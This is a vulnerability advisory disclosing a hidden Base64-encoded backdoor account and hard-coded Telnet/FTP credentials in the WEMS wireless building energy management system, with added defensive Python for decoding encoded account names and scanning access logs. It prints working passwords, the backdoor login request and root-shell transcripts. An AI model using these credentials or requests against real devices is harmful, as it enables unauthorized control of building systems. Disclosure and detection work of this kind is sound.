WEMS BEMS 21.3.1 Undocumented Backdoor Account  
Vendor: WEMS Limited  
Product web page:  
Affected version: Web: 21.3.1  
Web: 20.0beta  
Web: 19.5  
Web: 18.4  
Firmware: 1.26.6 (OS: 5.3)  
Firmware: 1.23.7 (OS: 5.0)  
Firmware: 1.21.4 (OS: 4.1a-usb)  
Firmware: (OS: i686-1.1)  
Platform: Shockwave Flash (SWF) / CGI  
Summary: We (WEMS) offer the world's first fully wireless energy management system.  
Our solution enables your organization to take control of its energy costs, by monitoring  
lighting, heating and air conditioning equipment to identify wastage across multiple  
sites and start saving money instantly. Additionally, we offer a service which enables  
you to personally control the settings of your building - remotely, via text messaging  
and the internet - from wherever you happen to be in the world.  
Desc: The wireless BMS solution has an undocumented backdoor account whose credentials are stored Base64-encoded.
These credentials are never exposed to the end user and cannot be changed through any normal operation
of the controller via the RMI. An attacker could exploit this vulnerability by logging in with the
backdoor account, which carries the highest administrative privilege level, and gain full control of
the system. A Bash startup script generates the default accounts on the system together with their
passwords and privilege levels. The backdoor user is not shown in the user settings of the admin panel,
and it is created with the addhttpuser program at an undocumented privilege level 3, which grants full
remote access to every feature the WEMS offers. WEMS also ships with hard-coded, weak credentials for
Telnet/FTP access: gast:glasshou and root:glasshou.
Tested on: Linux 2.6.16 armv5tejl  
Adam 7000 System  
WEMS OS 5.3  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2019-5552  
Advisory URL:  
Excerpt from the bash script:
# cat /tmp/
if [ -n "${varSystem}" ];then
   #add 'V.A.R.' user credentials
   /mnt/bin/addhttpuser -u var -p 88fRK66Q -l 2 > /dev/null
   /mnt/bin/addhttpuser -u varuser -p user -l 1 > /dev/null
   /mnt/bin/addhttpuser -u varview -p view -l 0 > /dev/null
else
   #add 'wems' user credentials (the then/else/fi keyword lines are
   #assumed here; the excerpt as published omitted them)
   /mnt/bin/addhttpuser -u wems -p kup5EF4s -l 2 > /dev/null
   /mnt/bin/addhttpuser -u wemsuser -p user -l 1 > /dev/null
   /mnt/bin/addhttpuser -u wemsview -p view -l 0 > /dev/null
fi
echo "Adding logging user credentials..."
/mnt/bin/addhttpuser -u YWRhbWNvbGxlY3Q -p YzAxMTNjdGFkYW0K -l 3 > /dev/null
# Verify user added successfully... ($? is still addhttpuser's exit status)
if [ "$?" -eq "255" ]
then
   echo "Error when adding logging user credentials - aborting.."
   cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
else
   veri_user=`grep -e 'YWRhbWNvbGxlY3Q' /mnt/etc/httpusers`
   if [ -n "$veri_user" ]
   then
      echo "User credentials added successfully."
      cp -p /mnt/etc/httpusers /mnt/etc/httpusers.default
   else
      echo "Error when adding user credentials - restoring defaults."
      cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
   fi
fi
Default and hard-coded credentials:  
[Level 2/Admin - Web/SWF->CGI] : wems:kup5EF4s  
[Level 1/User - Web/SWF->CGI] : wemsuser:user  
[Level 0/View - Web/SWF->CGI] : wemsview:view  
[Level 3/Backdoor - Web/SWF->CGI] : YWRhbWNvbGxlY3Q:YzAxMTNjdGFkYW0K (adamcollect:c0113ctadam)  
V.A.R. (Value Added Reseller):  
[Level 2/Admin - Web/SWF->CGI] : var:88fRK66Q  
[Level 1/User - Web/SWF->CGI] : varuser:user  
[Level 0/View - Web/SWF->CGI] : varview:view  
[Level 500/User - Telnet/FTP] : gast:glasshou  
[Level 0/root - Telnet/FTP] : root:glasshou  
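The description above states that the backdoor account is Base64-encoded, and the credential list gives the decoded form. The following added example (written for this page, not code from WEMS or from the advisory) shows how an auditor can recover the cleartext from an account list and flag encoded names in general. It assumes only what the page shows: the username 'YWRhbWNvbGxlY3Q' appears in the startup script without its trailing '=' padding, so a strict decoder rejects it, and the password decodes with a trailing newline (the output of `echo ... | base64`), which is stripped.

```python
import base64


def b64decode_lenient(token):
    """Decode Base64 text whose trailing '=' padding may have been dropped.

    The backdoor username as it appears in the startup script,
    'YWRhbWNvbGxlY3Q', is 15 characters long and lacks the final '=' that
    standard Base64 requires, so base64.b64decode() raises 'Incorrect
    padding' on it. Re-adding the padding recovers the original bytes.
    """
    s = token.strip()
    if len(s) % 4 == 1:          # no valid Base64 string has this length
        raise ValueError("not a Base64 length: %r" % token)
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s, validate=True)


def decode_credential(user_b64, pass_b64):
    """Return the cleartext (username, password) behind an encoded pair.

    'YzAxMTNjdGFkYW0K' decodes to 'c0113ctadam\\n'; the trailing newline is
    what `echo ... | base64` produces and is stripped here.
    """
    user = b64decode_lenient(user_b64).decode("ascii").rstrip("\n")
    pwd = b64decode_lenient(pass_b64).decode("ascii").rstrip("\n")
    return user, pwd


def find_encoded_accounts(usernames):
    """Audit helper: return the usernames that are valid Base64 and decode
    to printable ASCII, which is how an encoded account hides in a user
    list. Ordinary names such as 'wems' or 'var' happen to be valid Base64
    too, but they decode to non-ASCII bytes and are therefore not reported.
    """
    hits = []
    for name in usernames:
        try:
            text = b64decode_lenient(name).decode("ascii").rstrip("\n")
        except ValueError:       # bad length, bad alphabet, or non-ASCII bytes
            continue
        if text and text.isprintable():
            hits.append(name)
    return hits


if __name__ == "__main__":
    # Account names from the credential list above.
    print(decode_credential("YWRhbWNvbGxlY3Q", "YzAxMTNjdGFkYW0K"))
    print(find_encoded_accounts(["wems", "wemsuser", "wemsview", "var",
                                 "varuser", "varview", "YWRhbWNvbGxlY3Q"]))
```

The heuristic in find_encoded_accounts is deliberately narrow (valid Base64 and printable ASCII after decoding); it is meant to shortlist names for a human to look at, not to prove that an account is a backdoor.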
When the auth command is passed through the cmd parameter, the cgiauth binary
reads the /mnt/etc/httpusers file and validates the supplied credentials against it.
To log in with the backdoor account, the following HTTP GET request is made:
GET /cgi-bin/cgiauth?user=YWRhbWNvbGxlY3Q&pass=YzAxMTNjdGFkYW0K&cmd=auth HTTP/1.1  
User-Agent: Noproblem/25.1  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Response observed:  
HTTP/1.1 200 OK  
content-type: text/html  
Transfer-Encoding: chunked  
Date: Fri, 13 Sep 2019 18:15:17 GMT  
Server: WEMS OS 5.0 Casino  
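Because the login is a plain GET to /cgi-bin/cgiauth with the username in the query string, any web-server or proxy log that records request targets can be checked for use of the backdoor and default accounts. The following added example (not code from the advisory or from WEMS) runs such a check over constructed sample lines. It assumes an access log in Common Log Format that keeps the query string; the real device's log format is not shown on the page. Only the first request line is taken from the advisory; the other lines, addresses and timestamps are invented.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample of a web-server access log in Common Log Format. The first
# request line is the one quoted in the advisory; the other lines, IPs and
# timestamps are invented for the example.
SAMPLE_LOG = """\
192.0.2.10 - - [13/Sep/2019:18:15:17 +0000] "GET /cgi-bin/cgiauth?user=YWRhbWNvbGxlY3Q&pass=YzAxMTNjdGFkYW0K&cmd=auth HTTP/1.1" 200 318
192.0.2.11 - - [13/Sep/2019:18:16:02 +0000] "GET /cgi-bin/cgiauth?user=wems&pass=xxxxxxxx&cmd=auth HTTP/1.1" 200 318
192.0.2.12 - - [13/Sep/2019:18:17:40 +0000] "GET /cgi-bin/cgiauth?user=jsmith&pass=xxxxxxxx&cmd=auth HTTP/1.1" 200 318
192.0.2.12 - - [13/Sep/2019:18:18:05 +0000] "GET /cgi-bin/cgiauth?user=jsmith&cmd=logout HTTP/1.1" 200 64
192.0.2.14 - - [13/Sep/2019:18:19:11 +0000] "GET /index.html HTTP/1.1" 200 1024
not a log line at all
"""

# Account names taken from the advisory's credential list.
BACKDOOR_USERS = {"YWRhbWNvbGxlY3Q"}              # undocumented level-3 account
DEFAULT_USERS = {"wems", "wemsuser", "wemsview",   # vendor defaults
                 "var", "varuser", "varview"}      # V.A.R. defaults

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def parse_line(line):
    """Split one CLF line into its fields; return None for lines that do not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def classify_auth(target):
    """For a request target, return (kind, username) where kind is
    'backdoor', 'default' or None. Only /cgi-bin/cgiauth?...cmd=auth counts
    as a login attempt; the pass parameter is never copied into a finding."""
    parts = urlsplit(target)
    if parts.path != "/cgi-bin/cgiauth":
        return None, None
    q = parse_qs(parts.query)
    if q.get("cmd", [None])[0] != "auth":
        return None, None
    user = q.get("user", [None])[0]
    if user in BACKDOOR_USERS:
        return "backdoor", user
    if user in DEFAULT_USERS:
        return "default", user
    return None, user


def find_suspicious_logins(log_text):
    """Return one finding per login attempt that used the backdoor or a
    shipped default account. The status code is recorded but not matched on:
    the advisory shows the backdoor login answered with 200 OK and documents
    no distinct failure response, so status alone is not a reliable signal."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind, user = classify_auth(rec["target"])
        if kind is not None:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "user": user,
                             "kind": kind, "status": rec["status"]})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_logins(SAMPLE_LOG):
        print("%(kind)-8s %(ip)-12s %(ts)s user=%(user)s status=%(status)s" % f)
```

Matching on the username set rather than on a raw substring keeps the check precise: a logout or a request for another path with the same user parameter is not reported, and a new default account can be added by extending DEFAULT_USERS.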
Running addhttpuser, reading httpusers file:  
# /mnt/bin/addhttpuser  
Usage is -u <username> -p <password> -l <level>  
# cat /mnt/etc/httpusers  
# ls -al /mnt/bin/addhttpuser  
-rwxr-xr-x 1 root root 16520 Jan 29 2014 /mnt/bin/addhttpuser  
Root shell:  
$ telnet  
Connected to  
Escape character is '^]'.  
- Adam 7000 System - Version 4.1a-usb -  
WEMS login: gast  
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
$ id  
uid=500(gast) gid=500  
$ su  
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
# id  
uid=0(root) gid=0(root)  
# netstat -nat  
Active Internet connections (servers and established)  
Proto Recv-Q Send-Q Local Address Foreign Address State  
tcp 0 0* LISTEN  
tcp 0 0* LISTEN  
tcp 0 0* LISTEN  
$ ftp  
WEMS FTP server (Version wu-2.6.2(12) Thu Feb 24 14:48:47 GMT 2011) ready.  
user root  
331 Password required for root.  
pass glasshou  
230 User root logged in.